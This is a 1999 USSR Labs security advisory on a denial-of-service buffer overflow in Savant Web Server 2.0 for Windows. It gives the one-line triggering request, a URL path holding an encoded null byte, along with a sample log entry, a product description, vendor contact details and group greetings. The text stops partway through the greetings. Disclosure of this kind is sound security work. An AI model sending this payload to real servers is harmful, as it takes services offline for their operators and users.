Local / Remote D.o.S Attack in Savant Web Server V2.0 WIN9X / NT / 2000



Savant Web Server V2.0 and possibly others versions.


USSR Advisory Code:   USSR-99026

Release Date:
December 28, 1999 [2/5]

Systems Affected:
Savant Web Server V2.0 Win9X / NT / 2K and possibly others versions.

About The Software:
Savant provides support for most modern web features and technologies, including: 

Common Gateway Interface (CGI) 1.0 and 1.1 
HTTP 0.9, 1.0, and 1.1 including keep-alive ability 
Comprehensive logging in the standard NCSA format 
User and group management 
Password protection 
Server-side image maps 
Support for over 40 file types, including MP3, RealAudio, and Microsoft
Office files XML, JavaScript, Java, and ActiveX, and more! 


UssrLabs found a Local / Remote Buffer overflow,the buffer overflow is
caused by a NULL get command.

in Internet Explorer address: Htpp://SavantServerIP/%00/

The D.O.S action is logged in, 
C:\Savant\Logs\general.txt, inside looks like this one

Attacker Ip - - [20/Dec/1999:00:10:27 -0300] "GET /%00/index.htmlindex.htmlindex
.htmlindex.htmlindex.html" 301 279

Do you do the w00w00?
This advisory also acts as part of w00giving. This is another contribution
to w00giving for all you w00nderful people out there. You do know what
w00giving is don't you? http://www.w00w00.org/advisories.html

Vendor Status:

Vendor   Url: http://hera.wku.edu/~lamonml/savant/index.html
Program  Url: http://hera.wku.edu/~lamonml/savant/download.html


Noting yet :(

Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic and